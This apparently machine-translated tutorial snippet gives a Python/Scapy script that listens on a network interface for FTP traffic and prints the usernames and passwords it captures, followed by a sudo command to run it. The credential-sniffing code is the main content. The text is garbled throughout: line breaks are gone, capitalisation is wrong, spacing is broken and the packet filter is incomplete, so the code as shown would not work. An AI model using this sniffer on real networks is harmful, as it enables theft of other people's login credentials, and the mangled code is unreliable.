Code:
#!/usr/share/env python#--*--coding=utf-8--*--import optparsefrom scapy.all import *def ftpsniff (pkt):d est = Pkt.getlayer (IP). Dstraw = pkt.sprintf ('%raw.load% ') user = Re.findall (' (? i) ' User (. *) ', Raw) pswd = Re.findall (' (? i) PASS ( . *) ', raw) if User:print ' [*] detected FTP Login to ' + str (dest) print ' [+] Username: ' + str (user[0]) elif pswd:print ' [+] Password: ' + str (pswd[0]) def ftpsniffmain ():p arser = Optparse. Optionparser (' usage%prog ' + '-i <interface> ') parser.add_option ('-i ', dest= ' interface ', type= ' string ', help= ' Specify interface to listen on ') (Options,args) = Parser.parse_args () if options.interface = = None:print Parser.usageexit ( 0) Else:conf.iface = Options.interfacetry:print ' FTP sniffer is running .... ' Sniff (filter= ' TCP port ', Prn=ftpsniff) Except Keyboardinterrupt:exit (0) If __name__ = = ' __main__ ': Ftpsniffmain ()
Run sniffer script: sudo python ftpsniff.py-i wlan0
Now we are logged in to FTP for testing
Sniff results
Python stunt-sniff FTP login password